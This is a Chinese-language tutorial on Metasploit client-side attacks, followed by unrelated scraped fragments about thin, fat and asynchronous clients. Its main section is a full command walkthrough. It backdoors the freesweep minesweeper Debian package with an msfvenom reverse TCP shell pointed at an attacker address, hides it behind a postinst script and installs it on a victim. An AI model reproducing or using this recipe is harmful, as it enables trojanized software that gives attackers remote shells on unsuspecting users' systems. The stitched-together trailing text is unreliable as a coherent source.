Mestasploit 客戶端滲透

2021-08-26 18:02:51 字數 1907 閱讀 9158

目錄

1. 簡介

2. 攻擊 windows

3. 攻擊 linux

4. 利用 acrobat reader 漏洞執行 payload

5. 利用 flash 外掛程式漏洞執行 paylaod

6. 利用 ie 瀏覽器漏洞執行 payload

7. 利用 jre 漏洞執行 payload

8. 生成 android 後門程式

9. 巨集感染

含有漏洞利用**的 web 站點

含有漏洞利用**的 doc、pdf等文件

誘騙被害者執行 payload

msfconsole

root@kali:~# apt-get --download-only install freesweep


root@kali:~# cd /var/cache/apt/archives/


root@kali:~# cp freesweep_0.90-3+b1_amd64.deb ~


root@kali:~# cd 


root@kali:~# dpkg -x freesweep_0.90-3+b1_amd64.deb free


root@kali:~# cd free


root@kali:~/free# mkdir debian/


root@kali:~/free# cd debian/


root@kali:~/free/debian# vim control 


package: freesweep


version: 0.90-3


section: games and amusement


priority: optional


architecture:amd64


maintainer: ubuntu motu developers (ubuntu-motu@ lists.ubuntu.com)


description: a text-based minesweeper


freesweep isan implementation of the popular minesweeper game,whereone tries to find all the mines without igniting any, based on hints givenby the computer.unlike most implementations of this game,freesweepworksinanyvisualtextdispl in linuxconsole,inanxterm,and inmost text-based terminals currently in use.


root@kali:~/free/debian# vim postinst


#!/bin/sh


sudo chmod 2755 /usr/games/freesweep_scores && /usr/games/freesweep_scores & /usr/games/freesweep &


root@kali:~/free# chmod 755 postinst 


# 生成 payload


root@kali:~/free/debiann# msfvenom -a x86 --platform linux -p linux/x86/shell/reverse_tcp lhost=10.10.10.131 lport=4444 -b "\x00" -f elf -o /root/free/usr/games/freesweep_scores


root@kali:~/free/debian# dpkg-deb --build /root/free


# 受害者機器安裝此軟體


root@lamp:/home/kevin/desktop# dpkg -i free.deb

瘦客戶端 胖客戶端 智慧型客戶端

胖客戶端模式將應用程式處理分成了兩部分 由使用者的桌面計算機執行的處理和最適合乙個集中的伺服器執行的處理。乙個典型的胖客戶端包含乙個或多個在使用者的pc上執行的應用程式,使用者可以檢視並運算元據 處理一些或所有的業務規則 同時提供乙個豐富的使用者介面做出響應。伺服器負責管理對資料的訪問並負責執行一些...

胖客戶端 瘦客戶端和富客戶端

以c s結構開發的網路應用程式,需要為客戶端開發專用的客戶端軟體,相對而言其客戶端比較龐大,在客戶端可以實現很多功能,分擔伺服器的負擔,屬於胖客戶端型別。以b s結構開發的web應用,其客戶端只是乙個瀏覽器,所有業務邏輯由伺服器端進行處理,相對而言客戶端比較瘦小,故稱為瘦客戶端。目前比較流行的一種開...

非同步客戶端和同步客戶端

先寫下我的理解,方便後邊閱讀資料校驗。一 同步客戶端 比如乙個連線有兩個請求,請求1 和 請求2,請求1 先發起請求,請求2後發起請求,則請求2 要等待請求1 響應完成才能接收到響應。舉個棗子,httpclient 傳送get請求,執行緒會一致阻塞,直到有響應結果。二 非同步客戶端 比如乙個連線有兩...